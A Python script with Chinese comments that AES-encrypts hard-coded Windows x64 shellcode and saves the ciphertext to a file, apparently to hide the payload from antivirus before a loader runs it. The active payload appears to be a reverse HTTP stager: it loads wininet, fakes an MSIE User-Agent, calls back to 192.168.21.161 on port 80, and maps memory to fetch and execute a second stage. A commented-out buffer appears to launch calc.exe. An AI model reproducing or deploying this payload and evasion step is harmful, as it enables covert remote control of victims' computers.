# aes_shellcode

from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad,unpad
import hashlib

# AES 加密函数
def aes_encode(data: bytes, key: str) -> bytes:
    # 将 key 处理成 16 字节
    key_bytes = hashlib.md5(key.encode()).digest()  # 16字节的key
    cipher = AES.new(key_bytes, AES.MODE_ECB)
    encrypted = cipher.encrypt(pad(data, AES.block_size))
    return encrypted
# AES 解密
def aes_decode(encrypted_data: bytes, key: str ) -> bytes:
    key_bytes = hashlib.md5(key.encode()).digest()
    cipher = AES.new(key_bytes, AES.MODE_ECB)
    decrypted = unpad(cipher.decrypt(encrypted_data), AES.block_size)
    return decrypted


key = "0XsW6Rn7"

# buf=b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

buf = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x5a\x7a\x46\x43\x00\x95\xba\xd0\x71\x54\x25\x29\x2d\x46\xd1\xa9\x9a\xa5\x41\x6b\x5c\xa0\xf3\x0d\x86\x90\x27\xab\xae\xec\xb4\x2b\xa6\x99\x86\x79\x81\xf8\xc6\xdc\xcd\xe8\x81\x05\xde\xd6\xef\xf6\x21\x6b\xc1\xea\x69\x15\xf3\x28\x08\x5d\x08\xa1\x62\x71\xae\xce\x1d\x13\xf5\x50\x94\xcb\x81\x2e\x86\xcb\xf7\x16\xa3\xb0\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\xcf\x2d\x4f\xe6\x8c\x4c\xee\xbc\x35\xa9\x4b\x48\x75\x46\xd3\xc6\x1f\x7c\x20\x37\x3e\xcf\x6b\x45\x6a\xee\xb6\xcc\x1a\xc9\x1d\xb5\x12\xa8\x7f\xe5\x8f\x2b\x01\x21\x78\x8a\x04\x7d\x0c\x6e\xde\xa8\x61\x61\x2c\x7f\x84\xd1\x99\x18\xb3\xf3\x2a\x6b\x7b\x2b\x0f\x48\xb0\xea\x9e\xb4\x25\xe5\x57\x84\x2c\xb2\xf3\x89\x4f\xfa\x83\xeb\x52\x18\xb9\xe9\x53\xba\x32\x2f\x02\x32\x22\x3a\x8b\x99\xb4\x43\x25\x66\x11\x38\x28\xd0\x3c\x50\x3c\xd4\xa7\x1c\xcb\xb7\xd4\x61\xd9\xda\x7c\x2e\xf2\x8d\x4e\x61\x01\x90\xa6\xa7\xfd\x7e\x96\xa2\x1b\x17\xb5\x20\x23\xd8\x53\x06\xb1\x78\x88\x5d\x26\x81\xed\x93\x2c\x79\xf4\x93\xe5\x93\xbf\xf5\x13\xc2\x37\xb1\xa3\xd8\x53\x7d\xac\x98\xfe\xd9\x8b\xdc\xb3\xe3\xca\x7a\x81\x45\xf1\xa0\x32\x7b\x5e\x95\xf1\x9e\x3b\x55\xf8\x9d\x83\x1b\x63\x65\x22\xe6\x34\x00\xd8\xe2\xe8\xc5\x3f\x95\xb6\x07\xd7\x8a\x9c\x87\x52\x8a\xd1\x7b\x47\xb2\x91\x1f\x40\x46\xc4\x84\x11\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x31\x2e\x31\x36\x31\x00\x3a\xde\x68\xb1"


# 将字符串转换为字节串（保持原始字节，不被 utf-8 编码破坏）
# buf_bytes = buf.encode('latin1')

aes_bytes = aes_encode(buf, key)
# print(aes_bytes)

with open('aes_shellcode.txt', 'wb') as f:
    f.write(aes_bytes)

print("编码完成，保存到 aes_shellcode.txt")